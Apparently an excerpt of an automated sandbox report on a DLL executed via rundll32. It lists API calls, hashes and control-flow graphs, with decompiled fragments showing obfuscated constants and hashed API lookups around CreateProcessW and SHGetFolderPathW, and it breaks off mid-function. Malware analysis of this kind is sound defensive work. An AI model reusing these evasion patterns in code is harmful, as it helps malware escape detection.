                                                                                                                                  • Instruction ID: 114a7da7a96a710019d018e3310f70194d77e8d1d4ad17994e9a4e3254b0148e
                                                                                                                                  • Opcode Fuzzy Hash: 085fbfbc5749637a8e2c0a48e3d829b6a396887fdc5499ebf166a1a814a86cbe
                                                                                                                                  • Instruction Fuzzy Hash: CE71F272410288EBCF69CFA4C9498CE3BB2FF48358F108119FE1696220D3B6C969DF45
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 10006A90 Relevance: 18.4, APIs: 1, Instructions: 16933COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 110 10006a90-10006aab call 1002f9a6 113 10006ab7-10012570 110->113 114 10006aad-10006ab2 110->114 116 10012584-1001258b 113->116 115 100125b4-100125b8 114->115 117 10012597-1001259b call 1002fa69 116->117 118 1001258d-10012595 116->118 121 100125a0-100125a9 117->121 118->116 122 100125ab-100125ad 121->122 123 100125af 121->123 122->115 123->115
                                                                                                                                  APIs
                                                                                                                                  • _malloc.LIBCMT ref: 10006A9C
                                                                                                                                    • Part of subcall function 1002F9A6: __FF_MSGBANNER.LIBCMT ref: 1002F9C9
                                                                                                                                    • Part of subcall function 1002F9A6: __NMSG_WRITE.LIBCMT ref: 1002F9D0
                                                                                                                                    • Part of subcall function 1002F9A6: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001), ref: 1002FA1E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocateHeap_malloc
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 501242067-0
                                                                                                                                  • Opcode ID: ab67eba576b62ed2242e6049fa4a9f00a0283ae289beaf397465af8560d1c9fc
                                                                                                                                  • Instruction ID: 7622b3071c216813c8acba396ad13572c3e9674cac4916c3917d4934f1ce5c91
                                                                                                                                  • Opcode Fuzzy Hash: ab67eba576b62ed2242e6049fa4a9f00a0283ae289beaf397465af8560d1c9fc
                                                                                                                                  • Instruction Fuzzy Hash: BF844072D0002ECFCF08DFECCA959EEFBB5FF68204B169259D425BB294C6356A11CA54
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 1002083B Relevance: 16.6, APIs: 11, Instructions: 103memoryCOMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(100575E0,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 1002084A
                                                                                                                                  • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 100208A0
                                                                                                                                  • GlobalHandle.KERNEL32(005E89A8), ref: 100208A9
                                                                                                                                  • GlobalUnlock.KERNEL32(00000000,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 100208B2
                                                                                                                                  • GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 100208C9
                                                                                                                                  • GlobalHandle.KERNEL32(005E89A8), ref: 100208DB
                                                                                                                                  • GlobalLock.KERNEL32 ref: 100208E2
                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 100208EC
                                                                                                                                  • GlobalLock.KERNEL32 ref: 100208F8
                                                                                                                                  • _memset.LIBCMT ref: 10020911
                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 1002093D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 496899490-0
                                                                                                                                  • Opcode ID: 23a5f943a2514d5899e1dc1f035ea6f74369b98ac7016ed06c6f01df95d95d17
                                                                                                                                  • Instruction ID: dc14c853345dee55639cdae2a1fd03b11c2696e398e705256622f09b1856cd91
                                                                                                                                  • Opcode Fuzzy Hash: 23a5f943a2514d5899e1dc1f035ea6f74369b98ac7016ed06c6f01df95d95d17
                                                                                                                                  • Instruction Fuzzy Hash: 08319C75600715AFE324CF24DD88A1AB7EAEB49241B01492AF996C3662EB71F8448B50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 1002FA69 Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • __lock.LIBCMT ref: 1002FA87
                                                                                                                                    • Part of subcall function 10035A99: __mtinitlocknum.LIBCMT ref: 10035AAD
                                                                                                                                    • Part of subcall function 10035A99: __amsg_exit.LIBCMT ref: 10035AB9
                                                                                                                                    • Part of subcall function 10035A99: EnterCriticalSection.KERNEL32(00000001,00000001,?,10035387,0000000D,10050C60,00000008,10035479,00000001,?,?,00000001,?,?,10030C69,00000001), ref: 10035AC1
                                                                                                                                  • ___sbh_find_block.LIBCMT ref: 1002FA92
                                                                                                                                  • ___sbh_free_block.LIBCMT ref: 1002FAA1
                                                                                                                                  • HeapFree.KERNEL32(00000000,?,10050988), ref: 1002FAD1
                                                                                                                                  • GetLastError.KERNEL32(?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387,0000000D,10050C60), ref: 1002FAE2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2714421763-0
                                                                                                                                  • Opcode ID: dc462893557a6a2c1efb59ab9fc79b5cbceadcecec0e23dee2ff352f2dee75c2
                                                                                                                                  • Instruction ID: c59143bfe651e608972d8f734a12067a167937505bca417355bd9d82aad263b9
                                                                                                                                  • Opcode Fuzzy Hash: dc462893557a6a2c1efb59ab9fc79b5cbceadcecec0e23dee2ff352f2dee75c2
                                                                                                                                  • Instruction Fuzzy Hash: 3D012BB5904316AEEB11DFB0EC05B9D7BB4EF013D2F50412DF008AE091DB35A840DB92
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 10001B80 Relevance: 3.1, APIs: 2, Instructions: 98COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 220 10001b80-10001b90 221 10001b92-10001b97 220->221 222 10001b9c-10001ba8 220->222 223 10001c9c-10001c9f 221->223 224 10001c04-10001c66 222->224 225 10001baa-10001bb5 222->225 228 10001c74-10001c91 VirtualProtect 224->228 229 10001c68-10001c71 224->229 226 10001bb7-10001bbe 225->226 227 10001bfa-10001bff 225->227 230 10001bc0-10001bce 226->230 231 10001be2-10001bf4 VirtualFree 226->231 227->223 232 10001c93-10001c95 228->232 233 10001c97 228->233 229->228 230->231 234 10001bd0-10001be0 230->234 231->227 232->223 233->223 234->227 234->231
                                                                                                                                  APIs
                                                                                                                                  • VirtualFree.KERNELBASE(00000000,?,00004000,?,10001E18,00000001,00000000,?,100025E8,?,?,?,?,100025E8,00000000,00000000), ref: 10001BF4
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1263568516-0
                                                                                                                                  • Opcode ID: dd38d51ca3a6b672f32aeaf0fb246c4496e8ccb210392943b19121075d5be09d
                                                                                                                                  • Instruction ID: 749d9464b473a0839557e7d3f54d457581c14e70089049c47b2cfbba366a5d19
                                                                                                                                  • Opcode Fuzzy Hash: dd38d51ca3a6b672f32aeaf0fb246c4496e8ccb210392943b19121075d5be09d
                                                                                                                                  • Instruction Fuzzy Hash: 5841B9746002099FEB48CF58C490FA9B7B2FB88350F14C659E81A9F395D731EE41CB84
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 10036624 Relevance: 3.0, APIs: 2, Instructions: 28memoryCOMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 235 10036624-10036642 HeapCreate 236 10036647-10036654 call 100365c9 235->236 237 10036644-10036646 235->237 240 10036656-10036663 call 10035aca 236->240 241 1003667a-1003667d 236->241 240->241 244 10036665-10036678 HeapDestroy 240->244 244->237
                                                                                                                                  APIs
                                                                                                                                  • HeapCreate.KERNELBASE(00000000,00001000,00000000,10030AEB,00000001,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C), ref: 10036635
                                                                                                                                  • HeapDestroy.KERNEL32(?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 1003666B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$CreateDestroy
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3296620671-0
                                                                                                                                  • Opcode ID: d3c419273cfe47b5decc93e2e70dd510a49122bb40b3ad2795d27682d43cbdf9
                                                                                                                                  • Instruction ID: 5adf962be877c1470e25a5b203e63be93066c2f5666ac54c72bc9e0dfe65a95a
                                                                                                                                  • Opcode Fuzzy Hash: d3c419273cfe47b5decc93e2e70dd510a49122bb40b3ad2795d27682d43cbdf9
                                                                                                                                  • Instruction Fuzzy Hash: 22E06D706103519EFB139B30CE8A33539F8FB5878BF008869F405C80A0FBA08840AA15
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 100019C0 Relevance: 2.6, APIs: 2, Instructions: 115memoryCOMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 245 100019c0-100019ee 246 10001a02-10001a0e 245->246 247 10001a14-10001a1b 246->247 248 10001b06 246->248 249 10001a83-10001a9e call 10001990 247->249 250 10001a1d-10001a2a 247->250 251 10001b0b-10001b0e 248->251 259 10001aa0-10001aa2 249->259 260 10001aa4-10001ac9 VirtualAlloc 249->260 253 10001a2c-10001a4e VirtualAlloc 250->253 254 10001a7e 250->254 257 10001a50-10001a52 253->257 258 10001a57-10001a7b call 100017c0 253->258 254->246 257->251 258->254 259->251 262 10001acb-10001acd 260->262 263 10001acf-10001afe call 10001810 260->263 262->251 263->248
                                                                                                                                  APIs
                                                                                                                                  • VirtualAlloc.KERNEL32(4D8B0000,00000000,00001000,00000004,?,1000257F,00000000), ref: 10001A41
                                                                                                                                  • VirtualAlloc.KERNELBASE(4D8B0000,8B118BBC,00001000,00000004,10012839,8B118BBC,?,1000257F,00000000,10012839,?), ref: 10001ABC
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                  • Opcode ID: 095274eb58cefc7da223eb8c3e93af1acb0495bf3fbc764276b25f8f0a8074d8
                                                                                                                                  • Instruction ID: bcee95509f27266f5ca249dd7f6d6a0ca5035efccc592cd1fda7edfbe35d51d4
                                                                                                                                  • Opcode Fuzzy Hash: 095274eb58cefc7da223eb8c3e93af1acb0495bf3fbc764276b25f8f0a8074d8
                                                                                                                                  • Instruction Fuzzy Hash: 0D51D9B4A0010AEFDB04CF94C991AAEB7F5FF48344F248599E905AB345D770EE91CBA1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002D7F5D Relevance: 1.6, APIs: 1, Instructions: 54processCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 275 2d7f5d-2d7ff1 call 2e20b9 call 2eaa30 CreateProcessW
                                                                                                                                  APIs
                                                                                                                                  • CreateProcessW.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,00000000,?,002DAD99,?,?,?,181C8C04,002DAD99), ref: 002D7FEB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 963392458-0
                                                                                                                                  • Opcode ID: f75a7139c89005ad41842e885698baffe79ed174033219a517191554fa823b18
                                                                                                                                  • Instruction ID: 8e7c4d04f71e9467acc981f8eaf821a22fdc7b680c0d641cc8fff065169fa155
                                                                                                                                  • Opcode Fuzzy Hash: f75a7139c89005ad41842e885698baffe79ed174033219a517191554fa823b18
                                                                                                                                  • Instruction Fuzzy Hash: C411D372402128BBDF619F91DD09CEF7F79FF093A4F549144FA1921121D2729A60EBA1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002E46BB Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 280 2e46bb-2e473b call 2e20b9 call 2eaa30 SHGetFolderPathW
                                                                                                                                  C-Code - Quality: 58%
                                                                                                                                  			E002E46BB(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* _t21;
				intOrPtr* _t25;
				void* _t26;

				E002E20B9(_t21);
				_v20 = 0x3f5bb0;
				_v16 = 0;
				_v12 = 0x996874;
				_v12 = _v12 << 0xf;
				_v12 = _v12 ^ 0xb43bad9d;
				_v8 = 0xebf0af;
				_v8 = _v8 ^ 0x3b7dcb24;
				_v8 = _v8 ^ 0x3b96d1fd;
				_t25 = E002EAA30(0x220, 0xdf0d4f1a, __ecx, 0x54d725f);
				_t26 =  *_t25(0, _a24, 0, 0, _a4, __ecx, __edx, _a4, 0, 0, 0, _a20, _a24, _a28); // executed
				return _t26;
			}










                                                                                                                                  0x002e46d5
                                                                                                                                  0x002e46da
                                                                                                                                  0x002e46e4
                                                                                                                                  0x002e46ec
                                                                                                                                  0x002e46f3
                                                                                                                                  0x002e46f7
                                                                                                                                  0x002e46fe
                                                                                                                                  0x002e4705
                                                                                                                                  0x002e470c
                                                                                                                                  0x002e4724
                                                                                                                                  0x002e4735
                                                                                                                                  0x002e473b

                                                                                                                                  APIs
                                                                                                                                  • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,B43BAD9D), ref: 002E4735
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FolderPath
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1514166925-0
                                                                                                                                  • Opcode ID: 618a3ba0faaefa928059a11cdf791cf9449ddf75a1a0986f9704d06953ed0748
                                                                                                                                  • Instruction ID: 623926b1ad967718e9b7b99544d0ccb191d07455a4043418726378b991a5eeae
                                                                                                                                  • Opcode Fuzzy Hash: 618a3ba0faaefa928059a11cdf791cf9449ddf75a1a0986f9704d06953ed0748
                                                                                                                                  • Instruction Fuzzy Hash: CD012C75801218BBCF15AFD6DC098DFBFB8EF45394F108145F91826211D2758A60DBD1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002D93ED Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 285 2d93ed-2d9461 call 2eaa30 ExitProcess
                                                                                                                                  C-Code - Quality: 73%
                                                                                                                                  			E002D93ED() {
				signed int _v8;
				signed int _v12;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _t24;

				_v28 = 0xda6c64;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = 0x88a564;
				_v12 = _v12 | 0x9bf5ed5c;
				_v12 = _v12 ^ 0x9bf17c37;
				_v8 = 0xd9241f;
				_v8 = _v8 * 0x5c;
				_v8 = _v8 + 0xccdd;
				_v8 = _v8 + 0x903;
				_v8 = _v8 ^ 0x4e0c4bb2;
				E002EAA30(0x1d2, 0x9df7cc0d, _t24, 0x98a8878d);
				ExitProcess(0);
			}








                                                                                                                                  0x002d93f3
                                                                                                                                  0x002d9405
                                                                                                                                  0x002d9411
                                                                                                                                  0x002d9412
                                                                                                                                  0x002d9413
                                                                                                                                  0x002d941a
                                                                                                                                  0x002d9421
                                                                                                                                  0x002d9428
                                                                                                                                  0x002d9433
                                                                                                                                  0x002d9436
                                                                                                                                  0x002d943d
                                                                                                                                  0x002d9444
                                                                                                                                  0x002d9451
                                                                                                                                  0x002d945b

                                                                                                                                  APIs
                                                                                                                                  • ExitProcess.KERNELBASE(00000000), ref: 002D945B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExitProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 621844428-0
                                                                                                                                  • Opcode ID: d0c754f3adca9a80957f35e1c78ce5c07ecf17b0c35f9d329434f55f6d35f6b1
                                                                                                                                  • Instruction ID: 20c346877a2b26e0dc8f8b5b4c2d4a6609497b1a866c8d3820a2d006b7e56a39
                                                                                                                                  • Opcode Fuzzy Hash: d0c754f3adca9a80957f35e1c78ce5c07ecf17b0c35f9d329434f55f6d35f6b1
                                                                                                                                  • Instruction Fuzzy Hash: 87F03C71901308FBEB04DBE8DA4699DFBB4EB50314F2081A9D604B3261E7705F459A91
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002DB23C Relevance: 1.3, APIs: 1, Instructions: 36stringCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 305 2db23c-2db2c6 call 2e20b9 call 2eaa30 lstrcmpiW
                                                                                                                                  C-Code - Quality: 58%
                                                                                                                                  			E002DB23C(intOrPtr __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, WCHAR* _a16) {
				signed int _v8;
				signed int _v12;
				void* _t27;
				int _t32;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E002E20B9(_t27);
				_v12 = 0x6268;
				_v12 = _v12 ^ 0x57e834c3;
				_v12 = _v12 + 0xffff2919;
				_v12 = _v12 + 0xffff3e3d;
				_v12 = _v12 ^ 0x57e9dc2b;
				_v8 = 0xa46433;
				_v8 = _v8 + 0x98ba;
				_v8 = _v8 | 0xc390ebe9;
				_v8 = _v8 + 0xd5b0;
				_v8 = _v8 ^ 0xc3bab866;
				E002EAA30(0xb5, 0x9df7cc0d, __ecx, 0xaca78213);
				_t32 = lstrcmpiW(_a16, _a4); // executed
				return _t32;
			}







                                                                                                                                  0x002db23f
                                                                                                                                  0x002db240
                                                                                                                                  0x002db241
                                                                                                                                  0x002db244
                                                                                                                                  0x002db247
                                                                                                                                  0x002db24a
                                                                                                                                  0x002db24e
                                                                                                                                  0x002db24f
                                                                                                                                  0x002db254
                                                                                                                                  0x002db25e
                                                                                                                                  0x002db26a
                                                                                                                                  0x002db271
                                                                                                                                  0x002db278
                                                                                                                                  0x002db27f
                                                                                                                                  0x002db286
                                                                                                                                  0x002db28d
                                                                                                                                  0x002db294
                                                                                                                                  0x002db29b
                                                                                                                                  0x002db2b3
                                                                                                                                  0x002db2c1
                                                                                                                                  0x002db2c6

                                                                                                                                  APIs
                                                                                                                                  • lstrcmpiW.KERNELBASE(EE1E6DE5,57E9DC2B), ref: 002DB2C1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrcmpi
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1586166983-0
                                                                                                                                  • Opcode ID: 26884a22f0da7bc497ec3f8ef604453e7fb46fa0b929fe200322ee9dcdc91410
                                                                                                                                  • Instruction ID: fb7ca3f518f3bc58fef050a16d8e156f6a8c912c1f73686c6f9e2e51d9787662
                                                                                                                                  • Opcode Fuzzy Hash: 26884a22f0da7bc497ec3f8ef604453e7fb46fa0b929fe200322ee9dcdc91410
                                                                                                                                  • Instruction Fuzzy Hash: 270116B2C04748FFDF45DFD4DD468AEBBB5EB44304F208188B90566262E3728F64AB61
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Non-executed Functions

                                                                                                                                  Function 002EE395 Relevance: 24.5, Strings: 19, Instructions: 720COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 79%
                                                                                                                                  			E002EE395(signed int __ecx, signed int* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, signed int _a44) {
				signed int _v4;
				signed int* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
